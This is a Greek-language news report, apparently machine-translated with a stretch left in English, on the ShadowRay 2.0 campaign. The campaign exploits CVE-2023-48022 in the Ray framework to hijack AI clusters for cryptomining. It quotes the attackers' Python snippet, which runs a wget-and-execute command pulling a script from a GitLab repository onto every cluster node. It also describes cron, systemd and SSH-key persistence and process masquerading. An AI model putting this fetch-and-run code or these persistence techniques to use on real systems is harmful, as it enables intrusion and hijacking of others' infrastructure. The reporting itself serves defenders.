Οι ερευνητές στον τομέα της κυβερνοασφάλειας ανακάλυψαν μια ενεργή παγκόσμια εκστρατεία hacking που αξιοποιεί ένα γνωστό ελάττωμα στο Ray, ένα πλαίσιο AI ανοιχτού κώδικα που χρησιμοποιείται ευρέως για τη διαχείριση κατανεμημένων εργασιών υπολογιστών.
Με το όνομα ShadowRay 2.0, αυτή η επίθεση εκμεταλλεύεται την ευπάθεια CVE-2023-48022 για να καταλάβει σιωπηλά τον έλεγχο ισχυρών συμπλεγμάτων υπολογιστών AI και να τα μετατρέψει σε λειτουργίες εξόρυξης κρυπτονομισμάτων.
Η καμπάνια αντιπροσωπεύει μια σημαντική κλιμάκωση από την αρχική ανακάλυψη του ShadowRay τον Μάρτιο του 2024, με τους επιτιθέμενους να χρησιμοποιούν εξελιγμένες τακτικές για να παραμείνουν κρυφοί ενώ εξάγουν μέγιστη αξία από παραβιασμένη υποδομή.
Οι ερευνητές της Oligo Security αναγνώρισαν την εκστρατεία επίθεσης στις αρχές Νοεμβρίου 2025, ανακαλύπτοντας ότι οι παράγοντες απειλών που χρησιμοποιούν το όνομα IronErn440 έχουν οπλίσει τα νόμιμα χαρακτηριστικά ενορχήστρωσης του Ray σε εργαλεία για αυτοδιαδιδόμενες επιθέσεις.
Αυτό που κάνει αυτή την απειλή ιδιαίτερα ανησυχητική είναι η τεράστια κλίμακα της έκθεσης. Ο αριθμός των εκτεθειμένων διακομιστών Ray παγκοσμίως έχει αυξηθεί από χιλιάδες κατά την αρχική ανακάλυψη σε περισσότερες από 230.000 περιπτώσεις σήμερα.
Πολλά ανήκουν σε ενεργές startups, ερευνητικά εργαστήρια και παρόχους φιλοξενίας cloud, δημιουργώντας μια εκτεταμένη επιφάνεια επίθεσης.
Αναλυτές ασφαλείας Oligo Security αναγνωρισθείς την επίθεση μετά από παρατήρηση κακόβουλου λογισμικού που γνωρίζει την περιοχή που διανέμεται μέσω του GitLab.
Οι εισβολείς χρησιμοποίησαν αρχικά την πλατφόρμα DevOps για να παραδώσουν προσαρμοσμένα ωφέλιμα φορτία προσαρμοσμένα στη γεωγραφική τοποθεσία κάθε θύματος.
Μετά την κατάργηση του κακόβουλου αποθετηρίου στις 5 Νοεμβρίου 2025 από το GitLab, οι παράγοντες απειλών μετέφεραν γρήγορα τη λειτουργία τους στο GitHub, επιδεικνύοντας αξιοσημείωτη λειτουργική ευελιξία.
Μέχρι τις 10 Νοεμβρίου, είχαν δημιουργήσει ένα νέο αποθετήριο και συνέχισαν την καμπάνια τους με ακόμη μεγαλύτερη κομψότητα.
AI επιτίθεται στην υποδομή AI
Η επίθεση εκτυλίσσεται σε πολλαπλά συντονισμένα στάδια, ξεκινώντας με την αναγνώριση χρησιμοποιώντας το interact.sh, μια πλατφόρμα εκτός ζώνης που επιτρέπει στους εισβολείς να εντοπίζουν ευάλωτους διακομιστές χωρίς παραδοσιακή θορυβώδη σάρωση.
Οι επιτιθέμενοι στέλνουν ανιχνευτές στοχεύοντας το μη προστατευμένο Jobs API του Ray, πυροδοτώντας επανακλήσεις από ευάλωτες περιπτώσεις. Μόλις εντοπιστούν οι στόχοι, εκμεταλλεύονται τον μη πιστοποιημένο πίνακα ελέγχου Ray για να υποβάλουν κακόβουλες εργασίες που εκτελούν αυθαίρετο κώδικα με δικαιώματα συμπλέγματος.
.webp.jpeg)
Η πιο αξιοσημείωτη πτυχή είναι η χρήση ωφέλιμων φορτίων που δημιουργούνται από AI. Οι εισβολείς αναπτύσσουν κώδικα Python που ανακαλύπτει αυτόματα διαθέσιμους πόρους συμπλέγματος, υπολογίζει το 60 τοις εκατό κατανομή CPU και GPU για να αποφύγει τον άμεσο εντοπισμό και στη συνέχεια εισάγει εξορύκτες κρυπτονομισμάτων μεταμφιεσμένους ως νόμιμες διαδικασίες συστήματος.
Τα ωφέλιμα φορτία επιδεικνύουν περίπλοκο χειρισμό σφαλμάτων και αυτοπροσαρμογή, υποδηλώνοντας ότι δημιουργήθηκαν ή βελτιώθηκαν χρησιμοποιώντας εργαλεία τεχνητής νοημοσύνης για την επιτάχυνση της ανάπτυξης ωφέλιμου φορτίου.
Ένα κρίσιμο απόσπασμα κώδικα δείχνει τον μηχανισμό μόλυνσης πολλαπλών σταδίων. Το αρχικό ωφέλιμο φορτίο πρόσβασης χρησιμοποιεί το NodeAffinitySchedulingStrategy του Ray για να απαριθμήσει τους κόμβους συμπλέγματος και να αναπτύξει σενάρια μόλυνσης σε κάθε έναν:
κόμβοι=[n for n in ray.nodes() if n.get('Alive', False)]
cmd='wget -qO- https://gitlab.com/ironern440-group/ironern440-project/-/raw/main/aa_clean.sh && chmod +x aa_clean.sh && ./aa_clean.sh'
[ray.get(ray.remote(lambda:subprocess.run(cmd,shell=True)).options(scheduling_strategy=NodeAffinitySchedulingStrategy...The attackers establish persistence through multiple mechanisms: cron jobs executing every fifteen minutes, systemd service hijacking, and SSH key injection into root accounts.
They mask malicious processes by renaming them to appear as legitimate kernel workers like [kworker/0:0] και υπηρεσίες φίλτρου dns, που ουσιαστικά κρύβονται σε κοινή θέα.
.webp.jpeg)
Αυτό που ξεχωρίζει αυτή την καμπάνια είναι η δυναμική του ενεργού ανταγωνισμού. Οι εισβολείς αναπτύσσουν σενάρια για να ανιχνεύσουν και να τερματίσουν τους ανταγωνιστές εξόρυξης κρυπτονομισμάτων και, στη συνέχεια, να αποκλείσουν ανταγωνιστικές ομάδες εξόρυξης μέσω κανόνων iptables και τροποποιήσεων του αρχείου κεντρικού υπολογιστή.
Στοχεύουν ακόμη και πισίνες σε συγκεκριμένα λιμάνια που χρησιμοποιούνται από ανταγωνιστικούς παράγοντες απειλών, αποκαλύπτοντας ένα υπόγειο οικοσύστημα όπου πολλές εγκληματικές ομάδες μάχονται για τους ίδιους διακυβευμένους πόρους.
Η προσαρμογή των υποδομών είναι εξίσου ανησυχητική. Για τα θύματα στην Κίνα, οι εισβολείς παραδίδουν ωφέλιμα φορτία για συγκεκριμένη περιοχή μέσω υπηρεσιών διακομιστή μεσολάβησης για να παρακάμψουν τους περιορισμούς δικτύου.
Χρησιμοποιούν γεωγραφική ανίχνευση μέσω του ip-api.com, εκτελώντας διαφορετικά σενάρια για κινεζικούς και διεθνείς στόχους.
Οι εισβολείς ενημερώνουν συνεχώς τα ωφέλιμα φορτία τους μέσω των δεσμεύσεων του GitLab, αντιμετωπίζοντας την υποδομή ως κώδικα και επιτρέποντας την εξέλιξη των τεχνικών τους σε πραγματικό χρόνο χωρίς να αναδιατάσσονται σε μηχανήματα-θύμα.










